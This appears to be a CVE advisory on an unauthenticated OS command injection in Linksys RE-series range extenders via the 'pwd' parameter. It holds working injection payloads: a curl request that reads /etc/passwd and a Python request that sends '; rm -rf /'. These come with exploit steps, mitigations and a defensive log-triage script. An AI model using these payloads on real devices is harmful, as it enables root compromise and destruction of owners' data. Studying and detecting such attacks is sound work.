How the CVE Works
The vulnerability exists in the `RP_checkCredentialsByBBS` function within `/goform/RP_checkCredentialsByBBS` in Linksys RE6500, RE6250, RE6300, RE6350, RE7000, and RE9000 firmware versions 1.0.013.001 to 1.2.07.001. Attackers can exploit this flaw by manipulating the `pwd` parameter to inject arbitrary OS commands due to insufficient input validation. Remote exploitation is possible, allowing unauthenticated attackers to execute malicious commands with root privileges. The public disclosure increases the risk of active exploitation.
DailyCVE Form
Platform: Linksys RE Series
Version: 1.0.013.001-1.2.07.001
Vulnerability: OS Command Injection
Severity: Critical
Date: 06/25/2025
Prediction: Patch by 08/2025
What Undercode Say
```bash
curl -X POST -d "pwd=$(cat /etc/passwd)" http://target/goform/RP_checkCredentialsByBBS
```

```python
import requests

payload = "; rm -rf /"
requests.post("http://target/goform/RP_checkCredentialsByBBS", data={"pwd": payload})
```
How Exploit
- Craft malicious `pwd` parameter with OS commands.
- Send payload via HTTP POST to `/goform/RP_checkCredentialsByBBS`.
- Commands execute with root privileges.
Protection from this CVE
- Disable remote admin access.
- Apply vendor patch (when released).
- Use network segmentation.
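Until a patch is applied, requests to the affected endpoint can be triaged from proxy or IDS logs. The following is an added example, not code from the original post or from Linksys; the management subnet, the event tuple layout and the sample events are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/goform/RP_checkCredentialsByBBS"      # path named in the advisory
MGMT_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed management subnet
# Separators, substitution and redirection syntax a shell would act on.
SHELL_META = re.compile(r"[;&|`<>\r\n]|\$\(|\$\{")

def triage(src_ip, method, url, body):
    """Return findings for one logged HTTP request; an empty list means not flagged."""
    if urlsplit(url).path != ENDPOINT or method.upper() != "POST":
        return []
    findings = []
    if ipaddress.ip_address(src_ip) not in MGMT_NET:
        findings.append("endpoint reached from outside management subnet")
    # parse_qs percent-decodes, so encoded forms (%3B, %60, %0A) are checked too.
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    for value in fields.get("pwd", []):
        hit = SHELL_META.search(value)
        if hit:
            findings.append(f"pwd contains shell syntax {hit.group()!r}")
    return findings

# Constructed sample events: (source IP, method, URL, form body).
SAMPLE_EVENTS = [
    ("192.168.1.23", "POST", "/goform/RP_checkCredentialsByBBS", "pwd=Summer2024"),
    ("192.168.1.23", "POST", "/goform/RP_checkCredentialsByBBS", "pwd=abc%3Bdef"),
    ("203.0.113.9", "POST", "/goform/RP_checkCredentialsByBBS", "pwd=%60abc%60"),
    ("203.0.113.9", "GET", "/index.html", ""),
]

def scan(events):
    """Map each flagged event index to its list of findings."""
    return {i: f for i, e in enumerate(events) if (f := triage(*e))}

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        print(SAMPLE_EVENTS[idx][0], found)
```

A legitimate password may contain some of these characters, so a `pwd` match is a triage signal to review alongside the source address rather than proof of exploitation.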
Impact
- Full device compromise.
- Unauthorized data access.
- Network persistence.
Sources:
Reported By: nvd.nist.gov